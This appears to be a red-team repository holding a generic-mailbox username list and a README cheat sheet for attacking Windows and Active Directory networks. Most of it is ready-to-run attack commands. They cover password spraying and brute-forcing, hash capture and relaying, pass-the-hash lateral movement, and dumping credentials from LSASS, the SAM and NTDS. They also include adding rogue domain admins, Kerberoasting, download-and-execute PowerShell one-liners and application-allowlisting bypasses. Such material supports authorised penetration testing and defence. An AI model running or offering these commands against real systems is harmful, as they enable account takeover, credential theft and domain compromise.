├── generic-accounts.txt └── README.md /generic-accounts.txt: -------------------------------------------------------------------------------- 1 | account 2 | accounting 3 | ad 4 | adm 5 | admin 6 | administrator 7 | advertising 8 | application 9 | applications 10 | billing 11 | business 12 | careers 13 | company 14 | complaints 15 | consultation 16 | contact 17 | contactus 18 | corp 19 | corporate 20 | customer.service 21 | design 22 | digital 23 | director 24 | example 25 | finance 26 | foi 27 | global 28 | help 29 | helpdesk 30 | hr 31 | info 32 | isales 33 | it 34 | jobs 35 | mail 36 | manager 37 | marketing 38 | media 39 | orders 40 | payroll 41 | post 42 | postmaster 43 | pr 44 | privacy 45 | queries 46 | query 47 | recruitment 48 | root 49 | sale 50 | sales 51 | supervisor 52 | supply 53 | support 54 | test 55 | testing 56 | trade 57 | enquiries 58 | safety 59 | customer-service 60 | reception 61 | webmaster 62 | ceo 63 | memberservices 64 | customer 65 | general 66 | trust 67 | healthway 68 | webadmin 69 | human.resources 70 | inquiries 71 | ask 72 | social 73 | office 74 | head 75 | headteacher 76 | enquiry 77 | email 78 | accounts 79 | sydney 80 | enquires 81 | mailbox 82 | law 83 | service 84 | reservations 85 | information 86 | schooladmin 87 | secretary 88 | enq 89 | advice 90 | studio 91 | bristol 92 | headoffice 93 | bookings 94 | property 95 | clerks 96 | bursar 97 | recruit 98 | manchester 99 | enquries 100 | postbox 101 | editor 102 | enquire 103 | all 104 | insurance 105 | md 106 | hq 107 | schooloffice 108 | services 109 | birmingham 110 | print 111 | hire 112 | headmaster 113 | architects 114 | admissions 115 | events 116 | solicitors 117 | lawyers 118 | au 119 | training 120 | lettings 121 | info.au 122 | adminoffice 123 | production 124 | contracts 125 | news 126 | solutions 127 | partners 128 | hello 129 | school 130 | team 131 | accountants 132 | consult 133 | operations 134 | holidays 135 | hotel 136 | editorial 137 | commercial 138 | action 139 | group 140 | customer.services 141 | insure 142 | melbourne 143 | care 144 | shop 145 | travel 146 | feedback 147 | ausales 148 | legal 149 | PRINCIPAL 150 | engineers 151 | traffic 152 | mailroom 153 | registrar 154 | parts 155 | ops 156 | stay 157 | sales.au 158 | glasgow 159 | administration 160 | conferences 161 | clerk 162 | central 163 | personnel 164 | aberdeen 165 | hostmaster 166 | liverpool 167 | exeter 168 | properties 169 | auinfo 170 | purchasing 171 | agency 172 | architect 173 | bradford 174 | conference 175 | projects 176 | salesau 177 | main 178 | oxford 179 | systems 180 | management 181 | leicester 182 | art 183 | ideas 184 | me 185 | welcome 186 | furniture 187 | postroom 188 | enqs 189 | press 190 | chambers 191 | quality 192 | export 193 | connect 194 | inquires 195 | hull 196 | dundee 197 | inbox 198 | plymouth 199 | people 200 | croydon 201 | europe 202 | online 203 | midlands 204 | staff 205 | books 206 | coventry 207 | construction 208 | e-mail 209 | info-au 210 | graphics 211 | theteam 212 | library 213 | invest 214 | newcastle 215 | technical 216 | townclerk 217 | kontakt 218 | bicester 219 | abingdon 220 | commerciale 221 | amministrazione 222 | comercial 223 | auctions 224 | auction 225 | web 226 | technik 227 | trading 228 | infos 229 | occasion 230 | helpline 231 | chairman 232 | surveying 233 | planning 234 | home 235 | informatique 236 | master 237 | club 238 | shipping 239 | used 240 | treasurer 241 | security 242 | sport 243 | architecture 244 | reservation 245 | development 246 | president 247 | hiredesk 248 | repairs 249 | franchise 250 | boss 251 | technique 252 | freight 253 | Equipment 254 | membership 255 | estate 256 | hospitality 257 | infodesk 258 | general.enquiries 259 | server 260 | member 261 | au-info 262 | bury 263 | institute 264 | analysis 265 | INFORMATICA 266 | vets 267 | users 268 | generalenquiries 269 | schoolmail 270 | admin.office 271 | learning 272 | producer 273 | farmer 274 | officeadmin 275 | education 276 | schoolinfo 277 | contact.us 278 | school.office 279 | mainoffice 280 | academy 281 | frontdesk 282 | euroinfo 283 | procurement 284 | salesinfo 285 | assistant 286 | theoffice 287 | genoffice 288 | webmail 289 | main.office 290 | gen.enquiries 291 | sms 292 | documents 293 | cio 294 | hrtemp 295 | servicedesk 296 | itservicedesk 297 | darwin 298 | adelaide 299 | bendigo 300 | ballarat 301 | calendar 302 | sas 303 | demo 304 | ohs 305 | whs 306 | announcement 307 | meetingroom1 308 | meetingroom 309 | itadmin 310 | crm 311 | crmsupport 312 | referral 313 | leave 314 | testuser 315 | testuser1 316 | socialclub 317 | socialevents 318 | noreply 319 | no-reply 320 | voicemail 321 | animal.ethics 322 | aqis 323 | counselling 324 | domesticadmissions 325 | edadvisor 326 | medicalservice 327 | safety 328 | srtc -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red-Team and Infrastructure Assessments 2 | 3 | ### External recon 4 | 5 | https://github.com/dcsync/recontools 6 | 7 | ### O365 bruting 8 | 9 | `python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1` 10 | 11 | Enumeration (opsec safe): 12 | 13 | `python o365creeper.py -f test.txt` 14 | 15 | https://github.com/0xZDH/o365spray 16 | 17 | ### subdomain finder 18 | 19 | https://spyse.com/ 20 | 21 | ### Cert search 22 | https://crt.sh 23 | `%.blah.com` 24 | ### search categorized expired domain 25 | `python3 ./domainhunter.py -r 1000` 26 | 27 | ### Metadata 28 | `PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com` 29 | 30 | ## Domain User Enumeration 31 | 32 | ### MailSniper 33 | 34 | #### Usernameharvest 35 | `Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt` 36 | #### Domainnameharvest 37 | `Invoke-DomainHarvestOWA -ExchHostname mail.domain.com` 38 | #### OWA Spray 39 | `Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt` 40 | 41 | ### Grab employee names from Linkedin 42 | 43 | `theharvester -d blah.com -l 1000 -b linkedin` 44 | 45 | https://github.com/m8r0wn/CrossLinked 46 | 47 | ### Extract Linkedin details from snov.io 48 | 49 | Regex to extract emails 50 | 51 | `grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"` 52 | 53 | ### Extract from burp 54 | 55 | `cat linkedin.txt | tr , '\n' | sed 's/\”//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'` 56 | 57 | ### Change format to b.lah 58 | 59 | `awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'` 60 | 61 | `awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt` 62 | 63 | ### Check usernames against AD: 64 | 65 | Handy if you have generated a list from linkedin or a list of usernames. 66 | 67 | `nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"` 68 | 69 | username list is located at `/usr/local/share/nmap/nselib/data/usernames.lst` in Kali 70 | 71 | ### Null sessions 72 | 73 | Still works on infra that was upgraded from 2k, 2k3. 74 | 75 | `net use \\IP_ADDRESS\ipc$ "" /user:""` 76 | 77 | Use enum4linux, enum or Dumpsec following the null session setup. 78 | 79 | ### GPP 80 | 81 | https://bitbucket.org/grimhacker/gpppfinder/src/master/ 82 | 83 | `findstr /S /I cpassword \\\sysvol\\policies\*.xml` 84 | 85 | ## situational awareness 86 | 87 | https://github.com/dafthack/HostRecon 88 | 89 | Privesc checks: 90 | https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation 91 | 92 | ## Network Attacks 93 | 94 | ### Responder 95 | 96 | Grab NetNTLM hashes off the network 97 | 98 | #### Without wpad: 99 | 100 | `responder -I eth0` 101 | 102 | #### With wpad: 103 | 104 | `responder -I eth0 --wpad -b -f -F` 105 | 106 | #### Filter logs from logs folder and remove machine accounts: 107 | 108 | `sort -m *.txt | uniq -d | awk '!/\$/'` 109 | 110 | #### Cracking with John: 111 | 112 | `john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt` 113 | 114 | Use hashcat on a more powerful box. This is only for easy wins. 115 | 116 | #### NTLM Relaying 117 | 118 | `ntlmrelayx.py -tf targets.txt -c ` 119 | 120 | ### MITM6 121 | 122 | `python mitm6.py -d blah.local` 123 | 124 | #### Capture hashes 125 | 126 | `impacket-smbserver hiya /tmp/ -smb2support` 127 | 128 | ## Bruteforce domain passwords 129 | ### Common Passwords 130 | 131 | $Company1 132 | $Season$Year 133 | Password1 134 | Password! 135 | Welcome1 136 | Welcome! 137 | Welcome@123 138 | P@55word 139 | P@55w0rd 140 | $month$year 141 | 142 | ### Using hydra 143 | 144 | `hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V` 145 | 146 | ### Bruteforce using net use 147 | 148 | `@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL` 149 | 150 | 151 | ### all systems 152 | 153 | `net view /domain > systems.txt` 154 | 155 | ### Local admin search using net use 156 | 157 | `@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username 158 | Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use 159 | /delete \\%s\C$ > NUL` 160 | 161 | ### Domain joined machine 162 | 163 | `Invoke-DomainPasswordSpray -Password Spring2017` 164 | 165 | ## Non-domain joined testing 166 | 167 | When you have an initial set of compromised creds run these from a Virtual Machine to place foothold on network as domain user. 168 | 169 | ### Shell with domain user privileges 170 | `C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe` 171 | 172 | `runas /netonly /user:blah@blah.com "mmc %SystemRoot%\system32\dsa.msc` 173 | 174 | Make sure you use the FQDN of the domain and set the reg key as below. 175 | 176 | ### check dc: 177 | `nltest /dsgetdc:domain.local` 178 | 179 | To change DC via registry to point at domain being tested: 180 | 181 | HKEY_LOCAL_MACHINE 182 | SYSTEM 183 | CurrentControlSet 184 | Services 185 | Netlogon 186 | Parameters 187 | “SiteName“ > DC1.domain.com 188 | 189 | ### Create session for use with dumpsec 190 | `net use \\10.0.0.1\ipc$ /user:domain.local\username password` 191 | 192 | ### Quick User lists and password policy enum 193 | 194 | `net users /domain` 195 | 196 | `net group /domain "Domain Admins"` 197 | 198 | `net accounts /domain` 199 | 200 | Note that the above commands do not work with runas. Below PowerView functions will work with runas. 201 | 202 | ### Powerview: 203 | 204 | `. .\PowerView.ps1` 205 | 206 | `Get-UserProperty -Properties samaccountname` 207 | 208 | `Get-NetGroupMember` 209 | 210 | `Get-DomainPolicy` 211 | 212 | Search shares and files using Invoke-FileFinder and Invoke-ShareFinder 213 | 214 | ## Domain Analysis 215 | 216 | ### BloodHound 217 | 218 | Run locally on non-domain joined machine (remember to add target domain to registry): 219 | 220 | ``..\BloodHound.ps1`` 221 | 222 | ``Invoke-BloodHound`` 223 | 224 | ### SharpHound 225 | 226 | `SharpHound.exe --CollectionMethod All` 227 | 228 | ### Run from remote shell 229 | 230 | Useful when you have a remote shell. 231 | 232 | `powershell Set-ExecutionPolicy RemoteSigned` 233 | 234 | `powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"` 235 | 236 | ### Run from web server or over Internet: 237 | 238 | Use this when you cannot copy BloodHound.ps1 over to target. 239 | 240 | `powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"` 241 | 242 | ### Run using Sharppick - AMSI bypass 243 | 244 | SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound" 245 | 246 | `SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"` 247 | 248 | ### Goddi (fast dump all domain info) 249 | 250 | `.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe` 251 | 252 | ### ADRecon (More detailed - Good for AD Auditing) 253 | 254 | https://github.com/sense-of-security/ADRecon 255 | 256 | ### Share and file finder 257 | `Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | 258 | Out-File -Encoding Ascii interesting-shares.txt` 259 | 260 | `Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 261 | 20 -OutFile juicy_files.csv` 262 | 263 | ### Eyewitness 264 | docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com 265 | 266 | ### Windows priv esc 267 | 268 | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 269 | 270 | ## Compromise and Lateral Movement 271 | 272 | ### Crackmapexec 273 | 274 | `crackmapexec smb 172.16.110.0/24` 275 | 276 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'` 277 | 278 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol` 279 | 280 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz` 281 | 282 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam` 283 | 284 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa` 285 | 286 | ### Winexe to boxes (not opsec safe) - service is run. No cleanup. 287 | 288 | `pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd` 289 | 290 | `pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd` 291 | 292 | ### Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service. 293 | 294 | `psexec.py user@IP` 295 | 296 | `psexec.py user@IP -hashes ntlm:hash` 297 | 298 | ### Impacket wmiexec.py (opsec safe - unless WMI logging is enabled) 299 | 300 | `wmiexec.py domain/user@IP` 301 | 302 | `wmiexec.py domain/user@IP -hashes ntlm:hash` 303 | 304 | ### Impacket smbclient (probably opsec safe as its just using SMB) 305 | 306 | `python smbclient.py domain/blahuser@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:blah` 307 | 308 | ## RDP Pass the Hash 309 | Using mimikatz: 310 | 311 | `privilege::debug` 312 | `sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"` 313 | 314 | If disabled: 315 | 316 | `sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe` 317 | `Enter-PSSession -Computer ` 318 | `New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force` 319 | 320 | ## Invoke the hash 321 | 322 | `Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah` 323 | 324 | ## Password dumping 325 | 326 | ### From Live Kali on a workstation 327 | `samdump2 SYSTEM SAM > hashes.txt` 328 | 329 | ### Local 330 | 331 | `C:\> reg.exe save hklm\sam c:\temp\sam.save` 332 | 333 | `C:\> reg.exe save hklm\security c:\temp\security.save` 334 | 335 | `C:\> reg.exe save hklm\system c:\temp\system.save` 336 | 337 | `secretsdump.py -sam sam.save -security security.save -system system.save LOCAL` 338 | 339 | `pwdump system sam` 340 | 341 | ### In Memory 342 | `C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1` 343 | 344 | `C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit` 345 | 346 | `C:\>mini.exe` 347 | 348 | https://github.com/b4rtik/ATPMiniDump 349 | 350 | ### From box 351 | 352 | `mimikatz # privilege::debug` 353 | `mimikatz # sekurlsa::logonPasswords full` 354 | 355 | ### Remote 356 | 357 | `impacket-secretsdump Administrator@ip` 358 | `impacket-secretsdump Administrator@ip -hashes ntlm:hash` 359 | 360 | ### Domain 361 | 362 | To find where NTDS is run the below: 363 | 364 | `reg.exe query hklm\system\currentcontrolset\services\ntds\parameters` 365 | 366 | ### vssadmin 367 | 368 | `C:\vssadmin list shadows` 369 | 370 | `C:\vssadmin create shadow /for=C:` 371 | 372 | `copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .` 373 | 374 | `copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .` 375 | 376 | `copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .` 377 | 378 | `secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm` 379 | 380 | remove machine accounts 381 | 382 | `grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt` 383 | 384 | only passwords for pipal 385 | 386 | `cut -f 3 -d ':' cracked_with_users_enabled.txt` 387 | 388 | `vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}` 389 | 390 | godumpsecrets for faster 391 | 392 | ### ntdsutil 393 | 394 | ``` 395 | C:\>ntdsutil 396 | ntdsutil: activate instance ntds 397 | ntdsutil: ifm 398 | ifm: create full c:\pentest 399 | ifm: quit 400 | ntdsutil: quit 401 | ``` 402 | 403 | `ntdsutil` 404 | 405 | `ntdsutil: snapshot` 406 | 407 | `ntdsutil: list all` 408 | 409 | `ntdsutil: create` 410 | 411 | `snapshot: mount 1` 412 | 413 | Cleanup snapshots: 414 | 415 | `snapshot: list all` 416 | 417 | `snapshot: unmount 1` 418 | 419 | `snapshot: list all` 420 | 421 | `snapshot: delete 1` 422 | 423 | ## Post Compromise (Not opsec safe) 424 | Add user to local admin and domain admin 425 | 426 | ### Add Domain Admin 427 | `net user username password /ADD /DOMAIN` 428 | 429 | `net group "Domain Admins" username /ADD /DOMAIN` 430 | 431 | ### Add Local Admin 432 | `net user username password /ADD` 433 | 434 | `net localgroup Administrators username /ADD` 435 | 436 | 437 | ### Tasklist scraper to find logged in admins 438 | 439 | If powershell not enabled or unable to run BloodHound this script will find admins. 440 | 441 | `#!/bin/sh` 442 | 443 | `for ip in $(cat ip.txt);do` 444 | 445 | `pth-winexe -U Admin%hash //$ip "ipconfig"` 446 | 447 | `pth-winexe -U Admin%hash //$ip "tasklist /v"` 448 | 449 | `done` 450 | 451 | ### Kerberoasting 452 | 453 | `Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat` 454 | 455 | https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1 456 | 457 | Invoke-AutoKerberoast 458 | 459 | `python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast` 460 | 461 | `IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast` 462 | 463 | ### Hashcat Alienware - kerbtgt hash cracking 464 | 465 | `sudo apt-get install nvidia-367` 466 | 467 | `sudo nvidia-smi` 468 | 469 | `reboot` 470 | 471 | `sudo hashcat -I` 472 | 473 | `hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst` 474 | 475 | ### LAPS - GetLAPSPasswords 476 | 477 | https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1 478 | 479 | ## Priv Esc 480 | ### Powerup 481 | 482 | `IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks` 483 | 484 | ## File Transfer 485 | 486 | ### SMB Server in Kali 487 | 488 | `python smbserver.py test /root/tools` 489 | 490 | ### Python Web Server 491 | 492 | `python -m SimpleHTTPServer ` 493 | 494 | ## Domain Fronting 495 | 496 | https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ 497 | https://signal.org/blog/doodles-stickers-censorship/ 498 | https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/ 499 | https://trac.torproject.org/projects/tor/wiki/doc/meek 500 | http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/ 501 | 502 | ## AWL bypasses 503 | 504 | ### Powershell without powershell.exe 505 | 506 | `SharpPick.exe -d "http://blah/blah.ps1"` 507 | 508 | ### Squiblytwo 509 | 510 | `wmic.exe os get /format:"http://blah/foo.xsl"` 511 | 512 | ### Sharpshooter 513 | 514 | https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/ 515 | 516 | `python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://blah/foo.xsl` 517 | 518 | ### cypher queries 519 | 520 | user to which box the user has localadmin 521 | 522 | `MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)` 523 | 524 | List of DAs 525 | 526 | `Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@BLAH.COM" return u.displayname` 527 | --------------------------------------------------------------------------------